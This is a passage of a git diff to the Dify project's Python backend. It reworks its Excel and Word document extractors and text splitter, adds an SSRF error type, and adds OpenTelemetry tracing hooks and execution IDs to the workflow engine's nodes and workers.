@@ -30,32 +36,38 @@ class ExcelExtractor(BaseExtractor): file_extension = os.path.splitext(self._file_path)[-1].lower() if file_extension == ".xlsx": - wb = load_workbook(self._file_path, data_only=True) - for sheet_name in wb.sheetnames: - sheet = wb[sheet_name] - data = sheet.values - cols = next(data, None) - if cols is None: - continue - df = pd.DataFrame(data, columns=cols) - - df.dropna(how="all", inplace=True) - - for index, row in df.iterrows(): - page_content = [] - for col_index, (k, v) in enumerate(row.items()): - if pd.notna(v): - cell = sheet.cell( - row=cast(int, index) + 2, column=col_index + 1 - ) # +2 to account for header and 1-based index - if cell.hyperlink: - value = f"[{v}]({cell.hyperlink.target})" - page_content.append(f'"{k}":"{value}"') - else: - page_content.append(f'"{k}":"{v}"') - documents.append( - Document(page_content=";".join(page_content), metadata={"source": self._file_path}) - ) + wb = load_workbook(self._file_path, read_only=True, data_only=True) + try: + for sheet_name in wb.sheetnames: + sheet = wb[sheet_name] + header_row_idx, column_map, max_col_idx = self._find_header_and_columns(sheet) + if not column_map: + continue + start_row = header_row_idx + 1 + for row in sheet.iter_rows(min_row=start_row, max_col=max_col_idx, values_only=False): + if all(cell.value is None for cell in row): + continue + page_content = [] + for col_idx, cell in enumerate(row): + value = cell.value + if col_idx in column_map: + col_name = column_map[col_idx] + if hasattr(cell, "hyperlink") and cell.hyperlink: + target = getattr(cell.hyperlink, "target", None) + if target: + value = f"[{value}]({target})" + if value is None: + value = "" + elif not isinstance(value, str): + value = str(value) + value = value.strip().replace('"', '\\"') + page_content.append(f'"{col_name}":"{value}"') + if page_content: + documents.append( + Document(page_content=";".join(page_content), metadata={"source": self._file_path}) + ) + finally: + wb.close() elif 
file_extension == ".xls": excel_file = pd.ExcelFile(self._file_path, engine="xlrd") @@ -63,9 +75,9 @@ class ExcelExtractor(BaseExtractor): df = excel_file.parse(sheet_name=excel_sheet_name) df.dropna(how="all", inplace=True) - for _, row in df.iterrows(): + for _, series_row in df.iterrows(): page_content = [] - for k, v in row.items(): + for k, v in series_row.items(): if pd.notna(v): page_content.append(f'"{k}":"{v}"') documents.append( @@ -75,3 +87,61 @@ class ExcelExtractor(BaseExtractor): raise ValueError(f"Unsupported file extension: {file_extension}") return documents + + def _find_header_and_columns(self, sheet, scan_rows=10) -> tuple[int, dict[int, str], int]: + """ + Scan first N rows to find the most likely header row. + Returns: + header_row_idx: 1-based index of the header row + column_map: Dict mapping 0-based column index to column name + max_col_idx: 1-based index of the last valid column (for iter_rows boundary) + """ + # Store potential candidates: (row_index, non_empty_count, column_map) + candidates: list[Candidate] = [] + + # Limit scan to avoid performance issues on huge files + # We iterate manually to control the read scope + for current_row_idx, row in enumerate(sheet.iter_rows(min_row=1, max_row=scan_rows, values_only=True), start=1): + # Filter out empty cells and build a temp map for this row + # col_idx is 0-based + row_map = {} + for col_idx, cell_value in enumerate(row): + if cell_value is not None and str(cell_value).strip(): + row_map[col_idx] = str(cell_value).strip().replace('"', '\\"') + + if not row_map: + continue + + non_empty_count = len(row_map) + + # Header selection heuristic (implemented): + # - Prefer the first row with at least 2 non-empty columns. + # - Fallback: choose the row with the most non-empty columns + # (tie-breaker: smaller row index). + candidates.append({"idx": current_row_idx, "count": non_empty_count, "map": row_map}) + + if not candidates: + return 0, {}, 0 + + # Choose the best candidate header row. 
+ + best_candidate: Candidate | None = None + + # Strategy: prefer the first row with >= 2 non-empty columns; otherwise fallback. + + for cand in candidates: + if cand["count"] >= 2: + best_candidate = cand + break + + # Fallback: if no row has >= 2 columns, or all have 1, just take the one with max columns + if not best_candidate: + # Sort by count desc, then index asc + candidates.sort(key=lambda x: (-x["count"], x["idx"])) + best_candidate = candidates[0] + + # Determine max_col_idx (1-based for openpyxl) + # It is the index of the last valid column in our map + 1 + max_col_idx = max(best_candidate["map"].keys()) + 1 + + return best_candidate["idx"], best_candidate["map"], max_col_idx diff --git a/api/core/rag/extractor/extract_processor.py b/api/core/rag/extractor/extract_processor.py index 0f62f9c4b6..013c287248 100644 --- a/api/core/rag/extractor/extract_processor.py +++ b/api/core/rag/extractor/extract_processor.py @@ -166,7 +166,7 @@ class ExtractProcessor: elif extract_setting.datasource_type == DatasourceType.NOTION: assert extract_setting.notion_info is not None, "notion_info is required" extractor = NotionExtractor( - notion_workspace_id=extract_setting.notion_info.notion_workspace_id, + notion_workspace_id=extract_setting.notion_info.notion_workspace_id or "", notion_obj_id=extract_setting.notion_info.notion_obj_id, notion_page_type=extract_setting.notion_info.notion_page_type, document_model=extract_setting.notion_info.document, diff --git a/api/core/rag/extractor/helpers.py b/api/core/rag/extractor/helpers.py index 5166c0c768..5b466b281c 100644 --- a/api/core/rag/extractor/helpers.py +++ b/api/core/rag/extractor/helpers.py @@ -45,6 +45,6 @@ def detect_file_encodings(file_path: str, timeout: int = 5, sample_size: int = 1 except concurrent.futures.TimeoutError: raise TimeoutError(f"Timeout reached while detecting encoding for {file_path}") - if all(encoding["encoding"] is None for encoding in encodings): + if all(encoding.encoding is None for encoding 
in encodings): raise RuntimeError(f"Could not detect encoding for {file_path}") - return [FileEncoding(**enc) for enc in encodings if enc["encoding"] is not None] + return [enc for enc in encodings if enc.encoding is not None] diff --git a/api/core/rag/extractor/word_extractor.py b/api/core/rag/extractor/word_extractor.py index c7a5568866..044b118635 100644 --- a/api/core/rag/extractor/word_extractor.py +++ b/api/core/rag/extractor/word_extractor.py @@ -84,22 +84,45 @@ class WordExtractor(BaseExtractor): image_count = 0 image_map = {} - for rel in doc.part.rels.values(): + for r_id, rel in doc.part.rels.items(): if "image" in rel.target_ref: image_count += 1 if rel.is_external: url = rel.target_ref - response = ssrf_proxy.get(url) + if not self._is_valid_url(url): + continue + try: + response = ssrf_proxy.get(url) + except Exception as e: + logger.warning("Failed to download image from URL: %s: %s", url, str(e)) + continue if response.status_code == 200: - image_ext = mimetypes.guess_extension(response.headers["Content-Type"]) + image_ext = mimetypes.guess_extension(response.headers.get("Content-Type", "")) if image_ext is None: continue file_uuid = str(uuid.uuid4()) - file_key = "image_files/" + self.tenant_id + "/" + file_uuid + "." 
+ image_ext + file_key = "image_files/" + self.tenant_id + "/" + file_uuid + image_ext mime_type, _ = mimetypes.guess_type(file_key) storage.save(file_key, response.content) - else: - continue + # save file to db + upload_file = UploadFile( + tenant_id=self.tenant_id, + storage_type=dify_config.STORAGE_TYPE, + key=file_key, + name=file_key, + size=0, + extension=str(image_ext), + mime_type=mime_type or "", + created_by=self.user_id, + created_by_role=CreatorUserRole.ACCOUNT, + created_at=naive_utc_now(), + used=True, + used_by=self.user_id, + used_at=naive_utc_now(), + ) + db.session.add(upload_file) + # Use r_id as key for external images since target_part is undefined + image_map[r_id] = f"![image]({dify_config.FILES_URL}/files/{upload_file.id}/file-preview)" else: image_ext = rel.target_ref.split(".")[-1] if image_ext is None: @@ -110,27 +133,28 @@ class WordExtractor(BaseExtractor): mime_type, _ = mimetypes.guess_type(file_key) storage.save(file_key, rel.target_part.blob) - # save file to db - upload_file = UploadFile( - tenant_id=self.tenant_id, - storage_type=dify_config.STORAGE_TYPE, - key=file_key, - name=file_key, - size=0, - extension=str(image_ext), - mime_type=mime_type or "", - created_by=self.user_id, - created_by_role=CreatorUserRole.ACCOUNT, - created_at=naive_utc_now(), - used=True, - used_by=self.user_id, - used_at=naive_utc_now(), - ) - - db.session.add(upload_file) - db.session.commit() - image_map[rel.target_part] = f"![image]({dify_config.FILES_URL}/files/{upload_file.id}/file-preview)" - + # save file to db + upload_file = UploadFile( + tenant_id=self.tenant_id, + storage_type=dify_config.STORAGE_TYPE, + key=file_key, + name=file_key, + size=0, + extension=str(image_ext), + mime_type=mime_type or "", + created_by=self.user_id, + created_by_role=CreatorUserRole.ACCOUNT, + created_at=naive_utc_now(), + used=True, + used_by=self.user_id, + used_at=naive_utc_now(), + ) + db.session.add(upload_file) + # Use target_part as key for internal images + 
image_map[rel.target_part] = ( + f"![image]({dify_config.FILES_URL}/files/{upload_file.id}/file-preview)" + ) + db.session.commit() return image_map def _table_to_markdown(self, table, image_map): @@ -186,11 +210,17 @@ class WordExtractor(BaseExtractor): image_id = blip.get("{http://schemas.openxmlformats.org/officeDocument/2006/relationships}embed") if not image_id: continue - image_part = paragraph.part.rels[image_id].target_part - - if image_part in image_map: - image_link = image_map[image_part] - paragraph_content.append(image_link) + rel = paragraph.part.rels.get(image_id) + if rel is None: + continue + # For external images, use image_id as key; for internal, use target_part + if rel.is_external: + if image_id in image_map: + paragraph_content.append(image_map[image_id]) + else: + image_part = rel.target_part + if image_part in image_map: + paragraph_content.append(image_map[image_part]) else: paragraph_content.append(run.text) return "".join(paragraph_content).strip() @@ -227,6 +257,18 @@ class WordExtractor(BaseExtractor): def parse_paragraph(paragraph): paragraph_content = [] + + def append_image_link(image_id, has_drawing): + """Helper to append image link from image_map based on relationship type.""" + rel = doc.part.rels[image_id] + if rel.is_external: + if image_id in image_map and not has_drawing: + paragraph_content.append(image_map[image_id]) + else: + image_part = rel.target_part + if image_part in image_map and not has_drawing: + paragraph_content.append(image_map[image_part]) + for run in paragraph.runs: if hasattr(run.element, "tag") and isinstance(run.element.tag, str) and run.element.tag.endswith("r"): # Process drawing type images @@ -243,10 +285,18 @@ class WordExtractor(BaseExtractor): "{http://schemas.openxmlformats.org/officeDocument/2006/relationships}embed" ) if embed_id: - image_part = doc.part.related_parts.get(embed_id) - if image_part in image_map: - has_drawing = True - paragraph_content.append(image_map[image_part]) + rel = 
doc.part.rels.get(embed_id) + if rel is not None and rel.is_external: + # External image: use embed_id as key + if embed_id in image_map: + has_drawing = True + paragraph_content.append(image_map[embed_id]) + else: + # Internal image: use target_part as key + image_part = doc.part.related_parts.get(embed_id) + if image_part in image_map: + has_drawing = True + paragraph_content.append(image_map[image_part]) # Process pict type images shape_elements = run.element.findall( ".//{http://schemas.openxmlformats.org/wordprocessingml/2006/main}pict" @@ -261,9 +311,7 @@ class WordExtractor(BaseExtractor): "{http://schemas.openxmlformats.org/officeDocument/2006/relationships}id" ) if image_id and image_id in doc.part.rels: - image_part = doc.part.rels[image_id].target_part - if image_part in image_map and not has_drawing: - paragraph_content.append(image_map[image_part]) + append_image_link(image_id, has_drawing) # Find imagedata element in VML image_data = shape.find(".//{urn:schemas-microsoft-com:vml}imagedata") if image_data is not None: @@ -271,9 +319,7 @@ class WordExtractor(BaseExtractor): "{http://schemas.openxmlformats.org/officeDocument/2006/relationships}id" ) if image_id and image_id in doc.part.rels: - image_part = doc.part.rels[image_id].target_part - if image_part in image_map and not has_drawing: - paragraph_content.append(image_map[image_part]) + append_image_link(image_id, has_drawing) if run.text.strip(): paragraph_content.append(run.text.strip()) return "".join(paragraph_content) if paragraph_content else "" diff --git a/api/core/rag/index_processor/constant/built_in_field.py b/api/core/rag/index_processor/constant/built_in_field.py index 9ad69e7fe3..7c270a32d0 100644 --- a/api/core/rag/index_processor/constant/built_in_field.py +++ b/api/core/rag/index_processor/constant/built_in_field.py @@ -15,3 +15,4 @@ class MetadataDataSource(StrEnum): notion_import = "notion" local_file = "file_upload" online_document = "online_document" + online_drive = 
"online_drive" diff --git a/api/core/rag/splitter/fixed_text_splitter.py b/api/core/rag/splitter/fixed_text_splitter.py index 801d2a2a52..b65cb14d8e 100644 --- a/api/core/rag/splitter/fixed_text_splitter.py +++ b/api/core/rag/splitter/fixed_text_splitter.py @@ -2,6 +2,7 @@ from __future__ import annotations +import codecs import re from typing import Any @@ -52,7 +53,7 @@ class FixedRecursiveCharacterTextSplitter(EnhanceRecursiveCharacterTextSplitter) def __init__(self, fixed_separator: str = "\n\n", separators: list[str] | None = None, **kwargs: Any): """Create a new TextSplitter.""" super().__init__(**kwargs) - self._fixed_separator = fixed_separator + self._fixed_separator = codecs.decode(fixed_separator, "unicode_escape") self._separators = separators or ["\n\n", "\n", "。", ". ", " ", ""] def split_text(self, text: str) -> list[str]: @@ -94,7 +95,8 @@ class FixedRecursiveCharacterTextSplitter(EnhanceRecursiveCharacterTextSplitter) splits = re.split(r" +", text) else: splits = text.split(separator) - splits = [item + separator if i < len(splits) else item for i, item in enumerate(splits)] + if self._keep_separator: + splits = [s + separator for s in splits[:-1]] + splits[-1:] else: splits = list(text) if separator == "\n": @@ -103,7 +105,7 @@ class FixedRecursiveCharacterTextSplitter(EnhanceRecursiveCharacterTextSplitter) splits = [s for s in splits if (s not in {"", "\n"})] _good_splits = [] _good_splits_lengths = [] # cache the lengths of the splits - _separator = separator if self._keep_separator else "" + _separator = "" if self._keep_separator else separator s_lens = self._length_function(splits) if separator != "": for s, s_len in zip(splits, s_lens): diff --git a/api/core/tools/errors.py b/api/core/tools/errors.py index b0c2232857..e4afe24426 100644 --- a/api/core/tools/errors.py +++ b/api/core/tools/errors.py @@ -29,6 +29,10 @@ class ToolApiSchemaError(ValueError): pass +class ToolSSRFError(ValueError): + pass + + class 
ToolCredentialPolicyViolationError(ValueError): pass diff --git a/api/core/tools/utils/message_transformer.py b/api/core/tools/utils/message_transformer.py index ca2aa39861..df322eda1c 100644 --- a/api/core/tools/utils/message_transformer.py +++ b/api/core/tools/utils/message_transformer.py @@ -101,6 +101,8 @@ class ToolFileMessageTransformer: meta = message.meta or {} mimetype = meta.get("mime_type", "application/octet-stream") + if not mimetype: + mimetype = "application/octet-stream" # get filename from meta filename = meta.get("filename", None) # if message is str, encode it to bytes diff --git a/api/core/tools/utils/parser.py b/api/core/tools/utils/parser.py index 6eabde3991..3486182192 100644 --- a/api/core/tools/utils/parser.py +++ b/api/core/tools/utils/parser.py @@ -425,7 +425,7 @@ class ApiBasedToolSchemaParser: except ToolApiSchemaError as e: openapi_error = e - # openai parse error, fallback to swagger + # openapi parse error, fallback to swagger try: converted_swagger = ApiBasedToolSchemaParser.parse_swagger_to_openapi( loaded_content, extra_info=extra_info, warning=warning @@ -436,7 +436,6 @@ class ApiBasedToolSchemaParser: ), schema_type except ToolApiSchemaError as e: swagger_error = e - # swagger parse error, fallback to openai plugin try: openapi_plugin = ApiBasedToolSchemaParser.parse_openai_plugin_json_to_tool_bundle( diff --git a/api/core/workflow/graph_engine/graph_engine.py b/api/core/workflow/graph_engine/graph_engine.py index a4b2df2a8c..2e8b8f345f 100644 --- a/api/core/workflow/graph_engine/graph_engine.py +++ b/api/core/workflow/graph_engine/graph_engine.py @@ -140,6 +140,10 @@ class GraphEngine: pause_handler = PauseCommandHandler() self._command_processor.register_handler(PauseCommand, pause_handler) + # === Extensibility === + # Layers allow plugins to extend engine functionality + self._layers: list[GraphEngineLayer] = [] + # === Worker Pool Setup === # Capture Flask app context for worker threads flask_app: Flask | None = None @@ 
-158,6 +162,7 @@ class GraphEngine: ready_queue=self._ready_queue, event_queue=self._event_queue, graph=self._graph, + layers=self._layers, flask_app=flask_app, context_vars=context_vars, min_workers=self._min_workers, @@ -196,10 +201,6 @@ class GraphEngine: event_emitter=self._event_manager, ) - # === Extensibility === - # Layers allow plugins to extend engine functionality - self._layers: list[GraphEngineLayer] = [] - # === Validation === # Ensure all nodes share the same GraphRuntimeState instance self._validate_graph_state_consistency() diff --git a/api/core/workflow/graph_engine/layers/__init__.py b/api/core/workflow/graph_engine/layers/__init__.py index 0a29a52993..772433e48c 100644 --- a/api/core/workflow/graph_engine/layers/__init__.py +++ b/api/core/workflow/graph_engine/layers/__init__.py @@ -8,9 +8,11 @@ with middleware-like components that can observe events and interact with execut from .base import GraphEngineLayer from .debug_logging import DebugLoggingLayer from .execution_limits import ExecutionLimitsLayer +from .observability import ObservabilityLayer __all__ = [ "DebugLoggingLayer", "ExecutionLimitsLayer", "GraphEngineLayer", + "ObservabilityLayer", ] diff --git a/api/core/workflow/graph_engine/layers/base.py b/api/core/workflow/graph_engine/layers/base.py index 24c12c2934..780f92a0f4 100644 --- a/api/core/workflow/graph_engine/layers/base.py +++ b/api/core/workflow/graph_engine/layers/base.py @@ -9,6 +9,7 @@ from abc import ABC, abstractmethod from core.workflow.graph_engine.protocols.command_channel import CommandChannel from core.workflow.graph_events import GraphEngineEvent +from core.workflow.nodes.base.node import Node from core.workflow.runtime import ReadOnlyGraphRuntimeState @@ -83,3 +84,29 @@ class GraphEngineLayer(ABC): error: The exception that caused execution to fail, or None if successful """ pass + + def on_node_run_start(self, node: Node) -> None: # noqa: B027 + """ + Called immediately before a node begins execution. 
+ + Layers can override to inject behavior (e.g., start spans) prior to node execution. + The node's execution ID is available via `node._node_execution_id` and will be + consistent with all events emitted by this node execution. + + Args: + node: The node instance about to be executed + """ + pass + + def on_node_run_end(self, node: Node, error: Exception | None) -> None: # noqa: B027 + """ + Called after a node finishes execution. + + The node's execution ID is available via `node._node_execution_id` and matches + the `id` field in all events emitted by this node execution. + + Args: + node: The node instance that just finished execution + error: Exception instance if the node failed, otherwise None + """ + pass diff --git a/api/core/workflow/graph_engine/layers/node_parsers.py b/api/core/workflow/graph_engine/layers/node_parsers.py new file mode 100644 index 0000000000..b6bac794df --- /dev/null +++ b/api/core/workflow/graph_engine/layers/node_parsers.py @@ -0,0 +1,61 @@ +""" +Node-level OpenTelemetry parser interfaces and defaults. +""" + +import json +from typing import Protocol + +from opentelemetry.trace import Span +from opentelemetry.trace.status import Status, StatusCode + +from core.workflow.nodes.base.node import Node +from core.workflow.nodes.tool.entities import ToolNodeData + + +class NodeOTelParser(Protocol): + """Parser interface for node-specific OpenTelemetry enrichment.""" + + def parse(self, *, node: Node, span: "Span", error: Exception | None) -> None: ... 
+ + +class DefaultNodeOTelParser: + """Fallback parser used when no node-specific parser is registered.""" + + def parse(self, *, node: Node, span: "Span", error: Exception | None) -> None: + span.set_attribute("node.id", node.id) + if node.execution_id: + span.set_attribute("node.execution_id", node.execution_id) + if hasattr(node, "node_type") and node.node_type: + span.set_attribute("node.type", node.node_type.value) + + if error: + span.record_exception(error) + span.set_status(Status(StatusCode.ERROR, str(error))) + else: + span.set_status(Status(StatusCode.OK)) + + +class ToolNodeOTelParser: + """Parser for tool nodes that captures tool-specific metadata.""" + + def __init__(self) -> None: + self._delegate = DefaultNodeOTelParser() + + def parse(self, *, node: Node, span: "Span", error: Exception | None) -> None: + self._delegate.parse(node=node, span=span, error=error) + + tool_data = getattr(node, "_node_data", None) + if not isinstance(tool_data, ToolNodeData): + return + + span.set_attribute("tool.provider.id", tool_data.provider_id) + span.set_attribute("tool.provider.type", tool_data.provider_type.value) + span.set_attribute("tool.provider.name", tool_data.provider_name) + span.set_attribute("tool.name", tool_data.tool_name) + span.set_attribute("tool.label", tool_data.tool_label) + if tool_data.plugin_unique_identifier: + span.set_attribute("tool.plugin.id", tool_data.plugin_unique_identifier) + if tool_data.credential_id: + span.set_attribute("tool.credential.id", tool_data.credential_id) + if tool_data.tool_configurations: + span.set_attribute("tool.config", json.dumps(tool_data.tool_configurations, ensure_ascii=False)) diff --git a/api/core/workflow/graph_engine/layers/observability.py b/api/core/workflow/graph_engine/layers/observability.py new file mode 100644 index 0000000000..a674816884 --- /dev/null +++ b/api/core/workflow/graph_engine/layers/observability.py @@ -0,0 +1,169 @@ +""" +Observability layer for GraphEngine. 
"""
Observability layer for GraphEngine.

This layer creates OpenTelemetry spans for node execution, enabling distributed
tracing of workflow execution. It establishes OTel context during node execution
so that automatic instrumentation (HTTP requests, DB queries, etc.) automatically
associates with the node span.
"""

import logging
from dataclasses import dataclass
from typing import cast, final

from opentelemetry import context as context_api
from opentelemetry.trace import Span, SpanKind, Tracer, get_tracer, set_span_in_context
from typing_extensions import override

from configs import dify_config
from core.workflow.enums import NodeType
from core.workflow.graph_engine.layers.base import GraphEngineLayer
from core.workflow.graph_engine.layers.node_parsers import (
    DefaultNodeOTelParser,
    NodeOTelParser,
    ToolNodeOTelParser,
)
from core.workflow.nodes.base.node import Node
from extensions.otel.runtime import is_instrument_flag_enabled

logger = logging.getLogger(__name__)


@dataclass(slots=True)
class _NodeSpanContext:
    # Active span for one node execution plus the context-attach token
    # needed to restore the previous OTel context on detach.
    span: "Span"
    token: object


@final
class ObservabilityLayer(GraphEngineLayer):
    """
    Layer that creates OpenTelemetry spans for node execution.

    This layer:
    - Creates a span when a node starts execution
    - Establishes OTel context so automatic instrumentation associates with the span
    - Sets complete attributes and status when node execution ends
    """

    def __init__(self) -> None:
        super().__init__()
        # Keyed by node execution ID; one entry per in-flight node execution.
        self._node_contexts: dict[str, _NodeSpanContext] = {}
        self._parsers: dict[NodeType, NodeOTelParser] = {}
        self._default_parser: NodeOTelParser = cast(NodeOTelParser, DefaultNodeOTelParser())
        self._is_disabled: bool = False
        self._tracer: Tracer | None = None
        self._build_parser_registry()
        self._init_tracer()

    def _init_tracer(self) -> None:
        """Initialize OpenTelemetry tracer in constructor; disable the layer if unavailable."""
        if not (dify_config.ENABLE_OTEL or is_instrument_flag_enabled()):
            self._is_disabled = True
            return

        try:
            self._tracer = get_tracer(__name__)
        except Exception as e:
            logger.warning("Failed to get OpenTelemetry tracer: %s", e)
            self._is_disabled = True

    def _build_parser_registry(self) -> None:
        """Initialize parser registry for node types with specialized enrichment."""
        self._parsers = {
            NodeType.TOOL: ToolNodeOTelParser(),
        }

    def _get_parser(self, node: Node) -> NodeOTelParser:
        """Select the parser for this node's type, falling back to the default."""
        node_type = getattr(node, "node_type", None)
        if isinstance(node_type, NodeType):
            return self._parsers.get(node_type, self._default_parser)
        return self._default_parser

    @override
    def on_graph_start(self) -> None:
        """Called when graph execution starts; drop any stale per-node state."""
        self._node_contexts.clear()

    @override
    def on_node_run_start(self, node: Node) -> None:
        """
        Called when a node starts execution.

        Creates a span and establishes OTel context for automatic instrumentation.
        """
        if self._is_disabled:
            return

        try:
            if not self._tracer:
                return

            execution_id = node.execution_id
            if not execution_id:
                # Without an execution ID we cannot pair start/end; skip tracing.
                return

            parent_context = context_api.get_current()
            span = self._tracer.start_span(
                f"{node.title}",
                kind=SpanKind.INTERNAL,
                context=parent_context,
            )

            # Attach so instrumentation inside node.run() parents to this span.
            new_context = set_span_in_context(span)
            token = context_api.attach(new_context)

            self._node_contexts[execution_id] = _NodeSpanContext(span=span, token=token)

        except Exception as e:
            # Tracing must never break node execution.
            logger.warning("Failed to create OpenTelemetry span for node %s: %s", node.id, e)

    @override
    def on_node_run_end(self, node: Node, error: Exception | None) -> None:
        """
        Called when a node finishes execution.

        Enriches the span via the registered parser, always ends the span,
        then detaches the OTel context token and clears per-node state.
        """
        if self._is_disabled:
            return

        try:
            execution_id = node.execution_id
            if not execution_id:
                return
            node_context = self._node_contexts.get(execution_id)
            if not node_context:
                return

            span = node_context.span
            parser = self._get_parser(node)
            try:
                try:
                    parser.parse(node=node, span=span, error=error)
                finally:
                    # End the span even if the parser raises; otherwise the
                    # span would leak and never be exported.
                    span.end()
            finally:
                token = node_context.token
                if token is not None:
                    try:
                        context_api.detach(token)
                    except Exception:
                        logger.warning("Failed to detach OpenTelemetry token: %s", token)
                self._node_contexts.pop(execution_id, None)

        except Exception as e:
            logger.warning("Failed to end OpenTelemetry span for node %s: %s", node.id, e)

    @override
    def on_event(self, event) -> None:
        """Not used in this layer."""
        pass

    @override
    def on_graph_end(self, error: Exception | None) -> None:
        """Called when graph execution ends; warn about spans that were never ended."""
        if self._node_contexts:
            logger.warning(
                "ObservabilityLayer: %d node spans were not properly ended",
                len(self._node_contexts),
            )
            self._node_contexts.clear()
a/api/core/workflow/graph_engine/worker.py +++ b/api/core/workflow/graph_engine/worker.py @@ -9,6 +9,7 @@ import contextvars import queue import threading import time +from collections.abc import Sequence from datetime import datetime from typing import final from uuid import uuid4 @@ -17,6 +18,7 @@ from flask import Flask from typing_extensions import override from core.workflow.graph import Graph +from core.workflow.graph_engine.layers.base import GraphEngineLayer from core.workflow.graph_events import GraphNodeEventBase, NodeRunFailedEvent from core.workflow.nodes.base.node import Node from libs.flask_utils import preserve_flask_contexts @@ -39,6 +41,7 @@ class Worker(threading.Thread): ready_queue: ReadyQueue, event_queue: queue.Queue[GraphNodeEventBase], graph: Graph, + layers: Sequence[GraphEngineLayer], worker_id: int = 0, flask_app: Flask | None = None, context_vars: contextvars.Context | None = None, @@ -50,6 +53,7 @@ class Worker(threading.Thread): ready_queue: Ready queue containing node IDs ready for execution event_queue: Queue for pushing execution events graph: Graph containing nodes to execute + layers: Graph engine layers for node execution hooks worker_id: Unique identifier for this worker flask_app: Optional Flask application for context preservation context_vars: Optional context variables to preserve in worker thread @@ -63,6 +67,7 @@ class Worker(threading.Thread): self._context_vars = context_vars self._stop_event = threading.Event() self._last_task_time = time.time() + self._layers = layers if layers is not None else [] def stop(self) -> None: """Signal the worker to stop processing.""" @@ -122,20 +127,51 @@ class Worker(threading.Thread): Args: node: The node instance to execute """ - # Execute the node with preserved context if Flask app is provided + node.ensure_execution_id() + + error: Exception | None = None + if self._flask_app and self._context_vars: with preserve_flask_contexts( flask_app=self._flask_app, 
context_vars=self._context_vars, ): - # Execute the node + self._invoke_node_run_start_hooks(node) + try: + node_events = node.run() + for event in node_events: + self._event_queue.put(event) + except Exception as exc: + error = exc + raise + finally: + self._invoke_node_run_end_hooks(node, error) + else: + self._invoke_node_run_start_hooks(node) + try: node_events = node.run() for event in node_events: - # Forward event to dispatcher immediately for streaming self._event_queue.put(event) - else: - # Execute without context preservation - node_events = node.run() - for event in node_events: - # Forward event to dispatcher immediately for streaming - self._event_queue.put(event) + except Exception as exc: + error = exc + raise + finally: + self._invoke_node_run_end_hooks(node, error) + + def _invoke_node_run_start_hooks(self, node: Node) -> None: + """Invoke on_node_run_start hooks for all layers.""" + for layer in self._layers: + try: + layer.on_node_run_start(node) + except Exception: + # Silently ignore layer errors to prevent disrupting node execution + continue + + def _invoke_node_run_end_hooks(self, node: Node, error: Exception | None) -> None: + """Invoke on_node_run_end hooks for all layers.""" + for layer in self._layers: + try: + layer.on_node_run_end(node, error) + except Exception: + # Silently ignore layer errors to prevent disrupting node execution + continue diff --git a/api/core/workflow/graph_engine/worker_management/worker_pool.py b/api/core/workflow/graph_engine/worker_management/worker_pool.py index a9aada9ea5..5b9234586b 100644 --- a/api/core/workflow/graph_engine/worker_management/worker_pool.py +++ b/api/core/workflow/graph_engine/worker_management/worker_pool.py @@ -14,6 +14,7 @@ from configs import dify_config from core.workflow.graph import Graph from core.workflow.graph_events import GraphNodeEventBase +from ..layers.base import GraphEngineLayer from ..ready_queue import ReadyQueue from ..worker import Worker @@ -39,6 +40,7 @@ class 
    @property
    def execution_id(self) -> str:
        # Identifier shared by all events of one node execution; falsy
        # (unset) until ensure_execution_id() or run() has assigned it.
        return self._node_execution_id

    def ensure_execution_id(self) -> str:
        """Lazily assign and return this node's execution ID.

        Idempotent: the first call generates a UUID4 string; subsequent
        calls return the same value. Workers call this before invoking
        layer hooks so observability layers see the same ID that run()
        later stamps onto every emitted event.

        Returns:
            The (possibly newly created) execution ID string.
        """
        if not self._node_execution_id:
            self._node_execution_id = str(uuid4())
        return self._node_execution_id
self._node_execution_id = str(uuid4()) + execution_id = self.ensure_execution_id() self._start_at = naive_utc_now() # Create and push start event with required fields start_event = NodeRunStartedEvent( - id=self._node_execution_id, + id=execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.title, @@ -321,7 +328,7 @@ class Node(Generic[NodeDataT]): if isinstance(event, NodeEventBase): # pyright: ignore[reportUnnecessaryIsInstance] yield self._dispatch(event) elif isinstance(event, GraphNodeEventBase) and not event.in_iteration_id and not event.in_loop_id: # pyright: ignore[reportUnnecessaryIsInstance] - event.id = self._node_execution_id + event.id = self.execution_id yield event else: yield event @@ -333,7 +340,7 @@ class Node(Generic[NodeDataT]): error_type="WorkflowNodeError", ) yield NodeRunFailedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, start_at=self._start_at, @@ -512,7 +519,7 @@ class Node(Generic[NodeDataT]): match result.status: case WorkflowNodeExecutionStatus.FAILED: return NodeRunFailedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self.id, node_type=self.node_type, start_at=self._start_at, @@ -521,7 +528,7 @@ class Node(Generic[NodeDataT]): ) case WorkflowNodeExecutionStatus.SUCCEEDED: return NodeRunSucceededEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self.id, node_type=self.node_type, start_at=self._start_at, @@ -537,7 +544,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: StreamChunkEvent) -> NodeRunStreamChunkEvent: return NodeRunStreamChunkEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, selector=event.selector, @@ -550,7 +557,7 @@ class Node(Generic[NodeDataT]): match event.node_run_result.status: case WorkflowNodeExecutionStatus.SUCCEEDED: return NodeRunSucceededEvent( - id=self._node_execution_id, + id=self.execution_id, 
node_id=self._node_id, node_type=self.node_type, start_at=self._start_at, @@ -558,7 +565,7 @@ class Node(Generic[NodeDataT]): ) case WorkflowNodeExecutionStatus.FAILED: return NodeRunFailedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, start_at=self._start_at, @@ -573,7 +580,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: PauseRequestedEvent) -> NodeRunPauseRequestedEvent: return NodeRunPauseRequestedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_run_result=NodeRunResult(status=WorkflowNodeExecutionStatus.PAUSED), @@ -583,7 +590,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: AgentLogEvent) -> NodeRunAgentLogEvent: return NodeRunAgentLogEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, message_id=event.message_id, @@ -599,7 +606,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: LoopStartedEvent) -> NodeRunLoopStartedEvent: return NodeRunLoopStartedEvent( - id=self._node_execution_id, + 